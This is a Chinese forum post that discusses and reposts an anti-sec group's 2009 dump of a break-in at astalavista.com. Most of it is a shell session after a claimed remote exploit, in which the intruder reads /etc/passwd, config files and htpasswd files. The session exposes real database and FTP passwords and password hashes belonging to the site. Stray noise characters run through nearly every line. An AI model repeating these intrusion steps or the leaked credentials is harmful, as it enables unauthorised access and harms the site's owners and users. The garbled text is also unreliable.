里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
3 x; I) z( B/ v" h" ^6 w
" |. G- F/ u9 m: E$ }4 b) {9 Q[root@front3 ~]# curl -I litespeedtech.com* O, k5 y; a, g9 B8 v6 ~
HTTP/1.1 200 OK
: I" S! [4 E( oDate: Fri, 05 Jun 2009 22:54:51 GMT
7 E. T2 e* F3 J! V- [Server: LiteSpeed O% g- i9 B$ \! e9 ]( m
& ]! [' V" E! J. @: R另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
' L- T' }( P& N
, n S! q) n; H- p0 }' S+ K) }有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
$ f/ {% K" Q; J2 [! f# s2 R/ \1 M/ n4 ^3 }0 R1 V" I5 R3 n
! R( r- m- r2 T9 j+ J5 ?/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
8 H9 f1 ?/ O1 @3 o8 i) G, z& p/ g/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \9 a7 G- x: Y2 {1 [- d+ ]
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
# G, L/ e* ^9 O$ P\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /* B( N( I7 E4 R/ I" {: l6 u
\/ \/ \/ \/ \/ \/ \/& G1 l! A# f+ o" f! N$ j1 t" F
The Hacking & Security Community
s% M# V1 v* A! @% F[+] Founded in 1997 by a hacker computer enthusiast+ \4 J/ P8 A z; j2 N* D. g
[-] Exposed in 2009 by anti-sec group
+ x7 D2 T$ }2 D
" r9 P+ V1 h9 G7 \# }2 t! Y! M! F( UFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:% q O& s7 }0 V
>> 03. Who’s behind the site?
}( P9 e. n# G& a6 e% e>>
% d4 y6 g9 z' `2 h>> A team of security and IT professionals, and a countless number of contributors from all over the world.
' K5 s% K( [" a( k$ E1 @" {. T9 P! [! w" z$ U# i& T
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?% Q- y4 m' ~; X4 h+ v' a$ v
>>$ D- {+ u4 ?2 |7 f2 r* w/ d6 |
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and/ S: Z0 I0 m* g2 W6 r2 q3 D P: v
military institutions.
8 u; {2 ~" e- j>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
C2 K2 }: D# T: R( c6 Q
0 ]% ]2 J$ N# L" `Why has Astalavista been targeted?
9 Y9 H" g* c; }. w2 _+ U$ s% }+ o3 p, P& F6 \5 p
Other than the fact that they are not doing any of this for the “community” but
1 b9 p2 y# _! K# |for the money, they spread exploits for kids, claim to be a security community
& X' Y i( v( M4 n* C(with no real sense of security on their own servers), and they charge you $6.66
1 D V8 U z$ pper months to access a dead forum with a directory filled with public releases& R8 J6 i4 B# \7 \
and outdated / broken services.
1 r4 {( N4 `* ~# l* H0 T# }
% w' X3 Y& I2 W5 Q; KWe wanted to see how good that “team of security and IT professionals” really is.; ?% Y( G& H' T
3 g6 I9 L$ g3 |" h I: D1 BLet’s begin.9 ~9 u8 q8 x( B( q" U; _
6 J+ f9 `4 @. a( } f2 n
anti-sec:~# ./g0tshell astalavista.com -p 80, v1 U; r" f+ P: u$ h/ [
[+] Connecting to astalavista.com:80
9 S$ l$ Q5 e+ A1 y; W6 H' J[+] Grabbing banner…
* |( Y( X7 c% m0 mLiteSpeed
! @0 M5 ]: x7 o3 a# X( `, C/ [6 i[+] Injecting shellcode…- e' M/ u, }% |
[-] Wait for it
0 Z w" E: Y' |6 y& u) T, n; k2 ^
: a' o& [6 O& i) E[~] We g0tshell
) [6 G+ w c, xuname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
# D$ `/ D b% @ID: uid=100(apache) gid=500(apache) groups=500(apache)
* f/ v; ]+ f7 D- F9 J3 v" C# ^0 |2 V6 M" T2 ? Y! s5 m' ]0 t/ A& f
sh-3.2$ cat /etc/passwd
8 v8 `+ \6 _$ x3 Oroot:x:0:0:root:/root:/bin/bash
) L& C/ T6 I; e9 t+ qbin:x:1:1:bin:/bin:/sbin/nologin K( t+ F( l# x# U A
daemon:x:2:2:daemon:/sbin:/sbin/nologin
1 j! O8 X+ N% b- \+ p& ^: xadm:x:3:4:adm:/var/adm:/sbin/nologin. a% ^0 F( D4 \( L" v* ^9 Z
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin5 g8 F0 L) F& W% q
sync:x:5:0:sync:/sbin:/bin/sync
. ]) E- \- C3 T2 m6 `2 C$ e0 hshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown, u+ C) L8 n, ?/ W6 `! s- T! |
halt:x:7:0:halt:/sbin:/sbin/halt2 ?! l- n2 P2 p+ W9 d
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+ R: M$ L$ K6 Onews:x:9:13:news:/etc/news:
3 C+ c" I, Z* V; `4 Cuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin2 r! ~, I. S0 z! G
operator:x:11:0 perator:/root:/sbin/nologin& f* Q @ G8 ?8 A
games:x:12:100:games:/usr/games:/sbin/nologin5 a0 e. [, M5 q- X3 ]
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ @5 j |. S& l4 q0 R7 e+ u1 ?ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin. O* T, t2 E0 K1 X1 a- g. @
nobody:x:99:99:Nobody:/:/sbin/nologin# h( \# N) ]4 s* ?. c5 ]$ ~
rpm:x:37:37::/var/lib/rpm:/sbin/nologin+ q8 m8 y. Y* k3 g9 h3 z, R
dbus:x:81:81:System message bus:/:/sbin/nologin
' P: W2 X' H7 Vnscd:x:28:28:NSCD Daemon:/:/sbin/nologin
+ R" d8 C# g4 N! d/ ~7 i6 j+ Z Smailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
7 a Q4 T( Q) j3 z' y. msmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin/ U E' {* P# T9 s8 s/ R9 e) o
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
# S; _4 ?9 p8 \haldaemon:x:68:68:HAL daemon:/:/sbin/nologin4 k# g4 O( T& n& @# ~( W
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
( s' [! Y4 u6 P! ]0 Grpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin7 M2 j) v8 y. D2 w
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
: J8 o% f9 L: Z( l; m: Fsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
5 M2 K: c! o( P" J! K. A, qpcap:x:77:77::/var/arpwatch:/sbin/nologin
+ g7 _7 q' ^/ D' Gnamed:x:25:25:Named:/var/named:/sbin/nologin7 v0 T" ^: f* P' x. V: `: ~
apache:x:100:500::/var/www:/bin/false& g% B$ Z7 o$ Y- U
diradmin:x:101:101::/usr/local/directadmin:/bin/bash1 b. K; M/ H9 O# p6 ?
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash3 M! W* g) u& B$ `
webapps:x:500:501::/var/www/html:/bin/bash% U4 Z4 a7 @% V0 {, X8 w
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash, |6 D' |2 F) ^( @
admin:x:501:502::/home/admin:/bin/bash
3 Q5 X2 i; r0 |0 kjon:x:502:503::/home/jon:/bin/bash; D$ y9 k: J% D! Y) t2 ^
com:x:503:504::/home/com:/bin/bash7 @9 a# H. u. l# g, E( T
ntp:x:38:38::/etc/ntp:/sbin/nologin
4 ]7 l3 z# D! i$ B' m0 `ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin/ \" T6 Q. S5 A# y
astanet:x:504:505::/home/astanet:/bin/bash
0 p, r) \# M7 Davahi:x:70:70:Avahi daemon:/:/sbin/nologin% U0 t, }; Y; Z+ }3 L
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
" R+ q3 P( R W' o+ ?' q+ m1 y- {7 ^1 _0 g. ?) `
sh-3.2$ cat /etc/hosts
3 P0 D6 C1 }6 j" r# Do not remove the following line, or various programs
) y& Z# W: ^! L) D# that require network functionality will fail.5 E& B; m# T0 C. ^* @: E% i, @
127.0.0.1 localhost.localdomain localhost8 X5 _& B7 f4 i0 C+ Z v6 x+ U6 p g3 o
::1 localhost6.localdomain6 localhost6
( d% u, I- Y. c% W( R: }80.74.154.172 asta1.astalavistaserver.com
' Y; a# Y: Y! m- I% S3 _
1 p$ t0 R3 q- f: w6 L* nsh-3.2$ pwd
( ?5 ~+ B9 g1 M+ Z8 M- k3 C/home/com/public_html
" k& c7 L) H& g; R W; g. t" J; k5 f. Q- j- E
sh-3.2$ ls -la
+ O% k9 ?1 f8 q& v# i) o0 ptotal 18460- V- ]+ C5 N6 o
drwxr-xr-x 30 com apache 4096 May 28 17:06 .: K$ m3 H; M5 W1 ]
drwx–x–x 11 com com 4096 Jun 25 2008 ... i# E: h x! d* Z# D: M5 p
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
% Y* l" o; j/ k1 ?* E! ldrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
. k7 s% V/ g1 I! _1 Fdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
1 b5 H2 H, U# Ldrwxrwxrwx 2 com com 4096 May 19 00:50 config8 L- ^& m* u7 t+ A' [( Z( x* M
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
3 B! o5 V$ J1 O+ q$ |1 `drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules4 \, Y( a7 B0 `* t$ s. b
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
; Q- _7 \5 y, u5 v) \( ldrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo' U; F! [5 i4 |# ~0 n1 g. R' U! r
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__* V9 h0 ~& J$ f8 ~% s1 F+ O
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
/ x) J. n. f! @3 u# E! ndrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd- Q. a. z, J& X2 W1 x, n
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor v/ _* h2 Q' b5 p
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
# C, L& Z* I6 v8 V6 z( C. sdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed' ? a; z! n& s$ S5 Z8 v2 _
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess4 i& G4 ]7 Q- F" h, j1 h) ~9 O
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
/ s3 d9 A7 {# _9 W e/ V/ z9 x" h-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak9 O7 k- ^% R8 v1 X! k$ H
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool* P' V1 u+ P/ [2 @! Z, {* h8 _
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images( F; k/ l g- J8 B5 ?5 _: C
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
- \ y$ r5 N4 q! f9 vdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer2 B( K: l/ s7 R7 X) `& A u
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang7 g1 G8 m3 O$ {, k$ N# _
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
E' v" ^' Y8 j/ F5 Udrwxrwxrwx 12 com com 4096 Jun 2 07:47 media3 W' _9 g0 ^+ y5 L+ c2 m j
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
( F' g) \. n8 A* A9 I. r) Bdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
, ^ {3 T" B& d1 a# Fdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin% D T$ d: s6 V
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
. \9 @# `# Z. n- l+ S, Q; {( gdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
& @: N$ U$ ^ B7 fdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy. Z U- u4 ^7 A- n: y4 M
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy6 Q4 ]# `3 n; l, P2 U' @
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
" _$ S& _* f8 z, z& A3 T# Y2 h-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
. p" W3 r- t, J, S-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
# G: n5 Z Q( Zdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes: x3 k! z! d7 C8 Z) @/ B- {5 _
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp3 G. l+ x( `, s i7 Q' T
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
# g6 b7 [8 f' _) m' b& M7 S5 |1 G- O7 q, t1 Z
sh-3.2$ head -20 index.php
' s) Z4 _/ A9 u; g. j: a$ u! u& v<?php, k. }! o* X, K
1 P: h# J8 n' z- }
/**
8 @6 d7 O# j( F, p% i* The main page for the CMS/ ?$ K9 z! m* d- p9 n
* @copyright CONTREXX CMS - COMVATION AG
% l* X& F; {( X* @author Comvation Development Team
3 [/ t& P! |2 E# q* @version v1.0.9.10.1 stable3 P5 L6 Z L9 { x% D6 G
* @package contrexx
/ _+ C! N, I9 K* N1 F' }% e* @subpackage core* @' m& Q' H4 K+ T+ C4 l, Q7 s
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage$ V" |& U+ z% b0 x0 D+ E
* @since v0.0.0.0; i& T- W5 S/ d8 o/ `
* @todo Capitalize all class names in project, z# H& b" M; ?, z" ~
* @uses /config/configuration.php3 S0 R* ~# |1 ?( [* I( F$ a% b
* @uses /config/settings.php6 \" B b% H$ Q$ m b3 B
* @uses /config/version.php
% Z6 I3 _) P+ q5 A0 I* @uses /core/API.php
" X( R& W1 ]% Z4 i9 G3 `* @uses /core_modules/cache/index.class.php2 |) U! k* Q* i
* @uses /core/error.class.php
& b0 Y1 t7 |5 u! i* @uses /core_modules/banner/index.class.php
" s+ N8 X0 H$ H8 H* @uses /core_modules/contact/index.class.php. e% Q, K0 t W& d2 K
# t# ^; c- L3 J8 ] t5 k
sh-3.2$ cd config/
J# N3 M. X, K& @1 A" q% Lsh-3.2$ ls -la
3 o1 X) ]* \# R, `: Z& E) z6 s* {: [ Dtotal 32" N* k3 Z9 e2 ^1 A8 k8 [! c
drwxrwxrwx 2 com com 4096 May 19 00:50 .0 V! A( T1 K; U; s. i9 ?' c! J
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
" t9 C" u% T+ H J-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
5 m/ j7 T' U: B% e-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php* K" A" _/ L. T- W$ ~: d0 s
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
' H F! D$ _2 k7 J-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php7 J% ?- ^) @/ r# e* F/ ^$ @5 L
/ J5 v8 V, _0 @sh-3.2$ cat configuration.php7 X4 }2 U5 K$ ]- P6 v
[snip]2 F! u9 y6 w( ^$ R4 S+ E
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost, U0 P+ ~- f, `) Z# D
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name; Y% Y: l' R1 n- O+ K7 Z. \
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix" f8 h: k. K! e3 q
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username( m$ ~8 U" o; d o$ ~
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password8 c) j" V6 L4 Q/ r; g* K& D
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
* B1 }% z, r0 [: W5 N6 N$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
u$ d/ ]4 I' t) c' ]; b[snip]6 n! F0 J% D: T) I
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false% I3 K8 h/ V) ^
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode; f. @! T# n4 X" I
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
; n2 N9 {6 b5 C( O$ m1 C$_FTPCONFIG['port'] = 21; // Ftp remote port; J4 [0 o& z) y$ C
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username6 m9 j0 T& r7 W, K
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password# z2 ^' A4 L9 e9 g1 [$ B. T( z
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
* x" R* Q2 k# _" J' ^+ c
+ Y: b7 f' ]( d# x: Z& O, Q: b8 zsh-3.2$ cd ..3 y0 h6 s- D& s6 ]/ \( J' c7 @
sh-3.2$ cd dvd/
' z$ ?1 u! {! W6 y6 G9 j5 }sh-3.2$ ls -la: W4 X/ e$ ?; \# u! h0 B
total 2913780
6 p1 U0 A; x+ H9 ?# ?$ h0 H6 Idrwxr-xr-x 2 com com 4096 Sep 9 2008 .: ^* E' ]* l& U7 H/ a
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..3 W1 J: K( c! Y( f2 H$ `
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar v5 d, O C' k( A1 v) p) I
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar6 |# |; {; E" Z" d
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar) _' F; O2 [1 `
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
. ^7 M) S* G" _! Z" k! u. Z3 S- l/ {9 K
sh-3.2$ cat .htaccess
) o1 h G7 [/ D/ O2 F1 s) [7 b8 ?authType Basic
7 L+ _7 `) h. i+ T0 lauthName DVD
( |' J6 C) h) @" V+ i9 q, PauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
4 A% b4 [. E( i3 x$ ` S3 `, {require valid-user9 ?1 `- X, N9 b- [: u1 g6 b
& a' g+ f* p! k3 v& W9 ]3 [5 j! y
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd) Z) X2 F* i. k6 e8 [7 g4 B2 U+ P
DVDdownload:CRD8cuY6.MPT6
/ ]4 p) F: ]& ], {DVDdownload2:CR8a36.wluFMg Z1 U5 J# a( ?- W$ r3 ]
6 k& N# s8 U1 B; o8 K2 {' ?
sh-3.2$ cat test.php) {7 s/ i3 N, L# g' E6 N' q
<?php. u: w8 U# k; I0 Y
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
9 A) ~, F6 B R" m8 t a+ ]3 H) K$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));- ? [$ p7 M- H
echo $url;& Z9 X- n- g2 }2 ]1 L& J* t; j
?>) h& f' M$ _4 z6 r7 U6 a( C
1 D/ |" k5 ?& h' G- b
sh-3.2$ cd modifications/
& K1 N! I/ f5 T. z# \) h. ush-3.2$ ls -la+ `9 ~; y; e4 `5 V
total 32
3 D) x8 u4 U5 h) P; wdrwxr-xr-x 8 com com 4096 May 11 12:48 .8 A- |0 M. Q1 A5 H c! w0 e! Y, u
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..: k+ @% n3 K0 ?# N& v2 r9 I
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng& t) b" ^0 p/ V+ R2 `
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
" W8 n6 g8 c5 \3 }drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
' @( V u# k! w" H6 v& o* x4 ?drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc, X# A9 z: A& W7 Q
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
1 n: K4 T2 b5 t N' {drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
" }/ n/ G# T0 v6 S5 h
5 L/ z h9 ^, ^8 I, W; ]sh-3.2$ ls -R
0 D7 [/ ]2 Q. l* F% ?7 ?.:+ Z9 W) {9 z! X! {7 l
com_avtng cronjobs onlinetools pjirc search _tmp! g3 N Z) A. o
- D6 @3 @; ?9 ^5 d$ C; W! D9 z
./com_avtng:9 M. u+ B/ L, A6 v3 G# R7 [8 [
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
+ G F) u( S* b. d
5 q" S: S/ n3 h4 _. i( X./com_avtng/scripts:
9 P" F# t |* | k' n! N, [popunder.js
. A8 z& d$ l6 G2 o
. ] r1 {% `8 ]% Q$ N$ d' e./cronjobs:
3 M. z" S5 A3 k* Mexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp8 Q1 `2 }; u- k" B4 }
5 U ]& m" _, o7 X$ C
./cronjobs/tmp:
$ x0 A, l+ {+ a m+ m2 Zcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
! K! Y! G& G5 A$ V* N' V. }! W" s3 U; w
./onlinetools:% d8 x4 S) I! @5 y
index.php
5 O+ T1 N; z6 A" B! P4 }" e& l+ R& N( K0 S8 O2 r7 L; _+ R; L
./pjirc:1 T7 {3 C# ?" A( r8 F! {+ V
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt; L+ }+ ~! E& L% s5 ^. G5 _3 b
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
- M \0 T" ~. A0 Gbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
9 l2 l% O8 E8 s4 a: E( U: X* m! o6 \
./pjirc/img:/ b4 t$ y u! j; q- S* |
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
; N, d) R: g- r& J" Larbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
/ m a* U! P( O! Z2 L7 v- J! F6 m+ ?verre-eau.gif
, @" C+ P X! ?' B5 xargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif + z4 ?2 W2 e5 |0 B- `. S
verre-vin.gif
2 A7 H1 H9 f( i) I$ H2 g9 Wballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif7 Y; ] c$ t6 e( k0 f/ @9 {0 j
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
1 p$ h% R, g4 V, q7 x& n' O/ a' e1 p4 \, ]( g2 s9 @
./pjirc/snd:5 S- F3 E6 `' x8 f3 R! O
bell2.au ding.au- F: A& T5 v$ y# q- w5 W; C/ I
& q, \+ V- ]% ~7 G6 V+ q9 g./search:4 K. P% n7 p2 p5 @9 Y: M0 z. d
searchEngines.php search.php5 [7 \0 D. F6 S8 B
! _8 }4 |: d! B3 R5 j; W
./_tmp:
" W& x0 y! Y( n& zdefaultPorts.php defaultPorts.txt; P1 @4 A5 p% A9 V" ~& z
" R" B% A! Y( z+ L3 ?- jsh-3.2$ cd cronjobs/
. D: M. u+ A( J$ g8 t+ Osh-3.2$ cat exploits.php
6 l5 ?, T5 {* v% I0 ~" ?7 L[snip]
$ ~5 N9 D9 D( s+ E5 q$categories = array();
4 L& \- c {: a2 u, e9 {% B4 _$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;1 _+ Q3 s3 A2 j( ^% L
$expolits = file($milw0rmFile);
* p& ]' ^: ^ M3 ]; m$comExploits = array();+ P* `6 I! a( N d" `
[snip]
7 F# E# c: D* R+ s' g% M3 t// manage data
9 f6 q/ v# P# V- Y& T6 ffor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
0 ^# K2 _- J& g7 o
; I( t( d6 M( y5 R# h, p2 b // get path and title M r+ O/ V6 g, m5 w; k0 m* D
$expolits[$x] = trim($expolits[$x]);
* K X) @: |$ J3 Q9 Y, W $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
6 P5 {' ^0 q# C+ ^2 G $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);8 ~$ D7 t& {/ J& r4 P: |+ U P7 s
! P) b$ V8 e. W u# x: H
// check if file exists
) X9 m" S {6 |. o* v7 g if (file_exists($path)) {
1 n- O* X& v) n) [# A2 K' A8 x! e3 j' a$ m" J
$text = file_get_contents($path);
+ S* [5 h. p- b+ O
( K/ s2 v2 K9 u) T( X' s // get content and date4 _4 e" z% v/ P% [- T8 z
//$text = htmlspecialchars($text, ENT_QUOTES);
1 I9 t: o- y2 L) n1 Q $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
" f' j' _( C% N! D9 {6 N/ t if ($tmptext != ”) {( H* e! r. a& p6 x9 ^
$text = $tmptext;+ A5 M, Q \" j. Q2 ?& I: @
} else {' }) a" N. m$ ~( b* _
$text = addslashes(htmlentities($text, ENT_QUOTES));3 g1 _$ m' K! c0 B4 Z9 O" L
}& `: }% M2 e, f
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));" n) a! {& V- S% O+ v
$tmp = explode('-', $date);
6 d/ j1 C$ t& m0 E9 k( I $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));$ q: @ Y8 M4 Q: c5 S0 g( o
$cat = getCategory ($path);
& X% @6 v# ?/ d& V/ O! r) F2 U $ext = pathinfo(basename($path));4 Z# r6 z) W3 v+ k( c, C5 r' Z4 c
$ext = $ext['extension'];
1 Q- C0 c3 Z' y' m% c $qStr = ”) F3 s/ R8 t0 Q0 U+ I. h
SELECT `id`
: Q2 ?7 W L4 [' y1 J( y FROM `contrexx_module_exploits`
4 D1 i, u$ k ^0 ~! q% _' \& s* E WHERE `title` = ‘” . $title . “‘1 o/ L" U* l1 I1 S! w3 M% @9 S7 p+ t+ o
AND `date` = ‘” . $date . “‘5 W* a# t0 b+ _7 P
“;
# P+ K% v) D; k echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
l$ o, n8 F! z8 R1 p $q = $_objDB->query($qStr);/ c5 `( Z; G3 {9 \& N9 M( [) B
( k* h, Y h8 ^) D if ($q->numRows() == 0) {; m; ?/ n3 j: D- h, q8 U
/ E4 w; [ c; [4 ^
// prepare array9 @' ^, O# c M% K% s, i
$comExploits[$x]['date'] = $date;# ~! N# \% Q6 ~$ L
$comExploits[$x]['title'] = $title;' i$ z3 l, X+ ?. T5 ^1 ~% Z6 d" Y
$comExploits[$x]['author'] = ‘milw0rm’;7 G' r+ ]' U& p+ U
$comExploits[$x]['text'] = $text;" O5 I, J: P/ ]1 T* A' D# _
$comExploits[$x]['source'] = $ext;
) Z4 h3 d3 k, j: l- M2 ^# m $comExploits[$x]['url1'] = ”;8 L; ]0 x( I+ Q Q
$comExploits[$x]['url2'] = ”;
3 | P* d8 x% ] $comExploits[$x]['catid'] = $cat;5 F8 w& X$ o2 c' z0 \: J
$comExploits[$x]['lang'] = ‘2′;
& X1 ? f/ e+ S+ i $comExploits[$x]['userid'] = ‘12′;6 r5 V! | i/ N# U" ~% @. A/ m& N
$comExploits[$x]['startdate'] = ‘0000-00-00′;9 n z+ ^/ D4 {% q7 I5 [; l, A, I- M
$comExploits[$x]['enddate'] = ‘0000-00-00′;% N9 Y4 e, {/ y
$comExploits[$x]['status'] = ‘1′;& P: G2 _4 K3 `- H# D; }
$comExploits[$x]['changelog'] = $date;
+ x) ?; K- Y7 c E/ B; [2 v/ p- r& j% C2 P$ G
}: M( l" W6 h# N5 f5 A
[snip]8 \$ @, K* L/ y; W
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>3 o( l g, r# v' o) O
<rss version=”2.0″>! H8 ^$ J& i6 T# }" g
<channel>. ?# z3 H' H3 x D
<title>ASTALAVISTA.com - Exploits</title>
